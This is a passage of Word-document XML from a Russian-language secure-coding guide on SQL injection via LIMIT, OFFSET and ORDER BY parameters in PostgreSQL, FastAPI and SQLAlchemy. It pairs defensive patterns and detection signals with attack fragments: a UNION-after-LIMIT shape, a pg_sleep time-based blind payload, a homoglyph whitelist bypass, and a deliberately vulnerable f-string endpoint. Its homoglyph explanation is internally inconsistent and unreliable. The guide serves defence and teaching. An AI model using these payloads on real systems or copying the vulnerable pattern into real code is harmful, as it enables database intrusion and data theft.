          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    offset: int = Query(0, ge=0),</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title, published_at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status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT :limit OFFSET :offset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{"limit": limit, "offset": offset})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [dict(r._mapping) for r in result]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Шаблон 2: ORM-уровень (SQLAlchemy 2.x)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stmt = select(Article).where(Article.status == 'published') \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    .order_by(Article.published_at.desc()) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    .limit(limit).offset(offset)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Query(10, ge=1, le=100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в FastAPI делает три вещи: cast в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проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;= 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= 100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bind-параметр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отправляется через extended protocol с явным integer-типом — payload-инъекция физически невозможна. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Article.limit(limit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в ORM делает то же самое автоматически.</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f-string или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-concat в окрестности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В Python: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f"LIMIT {var}"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f"OFFSET {var}"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"LIMIT " + str(var)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. В JS: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LIMIT ${var}\`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. В Java: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"LIMIT " + var`.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запросы вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... LIMIT $1 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, где LIMIT-bind присутствует, но после него — UNION (нормальный pagination LIMIT-ом заканчивается). Любой UNION после LIMIT — критичный сигнал.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 access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query-string parameter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содержит non-numeric characters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%20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Application-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индикатор попытки stacked queries (Variant B заблокирован extended-mode).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Response-size anomaly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: при UNION-extraction response неожиданно содержит rows из других таблиц — резко больше байт, чем при обычном запросе с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">limit=10</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; LIMIT-expression context документирован с 7.x. Никакие фиксы не закрывают этот класс — это application-level mis-configuration.</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основной канал извлечения для Variant A. Граница: 3.1 — как формировать UNION-payload; 3.14.1 — куда его вставлять.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Variant B зависит от driver-mode; см. таблицу 3.5.6 для конкретных драйверов.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Time-based blind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LIMIT (SELECT CASE WHEN ... THEN 1 ELSE (SELECT 1 FROM pg_sleep(5)) END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — time-channel через subquery в LIMIT.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3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же класс integer-context, но в другом clause.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общие шаблоны type-coercion и range-check для integer-параметров.</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«SELECT» / «LIMIT Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-LIMIT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«Combining Queries (UNION, INTERSECT, EXCEPT)» — https://www.postgresql.org/docs/current/queries-union.html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OWASP: «SQL Injection Prevention Cheat Sheet» (раздел Defense Option 1: Prepared Statements) — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html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PortSwigger: «SQL injection cheat sheet» (раздел Combining queries) — https://portswigger.net/web-security/sql-injection/cheat-sheet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FastAPI Docs: «Query Parameters and String Validations» — https://fastapi.tiangolo.com/tutorial/query-params-str-validations/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SQLAlchemy Docs: «Using textual SQL» — https://docs.sqlalchemy.org/en/20/tutorial/dbapi_transactions.html#using-textual-sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.14.2 ORDER BY column_name (identifier-token)</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Sort-by-column в REST-API — пользователь указывает имя колонки для сортировки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort=created_at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). PostgreSQL Wire Protocol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">физически не позволяет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bind-параметру быть идентификатором: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подставляется только в expression-position. Это означает, что для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имя колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">должно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> попасть в SQL как литеральный текст. Единственная корректная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whitelist допустимых имён</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для финального quoting. Антипаттерны: whitelist-set с прямой concat без quoting, whitelist на lowercase без Unicode-нормализации (обход через Cyrillic-homoglyphs), отсутствие whitelist вообще (concat user input напрямую).</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app/api/v1/products.py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Query,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Антипаттерн A — whitelist-set, но concat без quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</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@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: str = Query("created_at"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: str = Query("asc"),  # "asc" или "desc"</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if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sort = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if order.lower() not in ("asc", "desc"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        order = "asc"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name, price, rating, created_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM products</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE deleted_at IS NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort} {order}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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Разработчик правильно сделал whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SORTABLE_COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не нормализовал входной string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед сравнением — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set membership</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Python case-sensitive и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не учитывает Unicode-эквивалентность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"Name" not in {"name", ...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → True → fallback на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"created_at"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"nаme"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с Cyrillic 'а') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тоже not in SORTABLE_COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → False → fallback. Кажется безопасным, но если whitelist-проверка имеет hole (например, разработчик добавил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if sort not in SORTABLE_COLUMNS: sort = sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
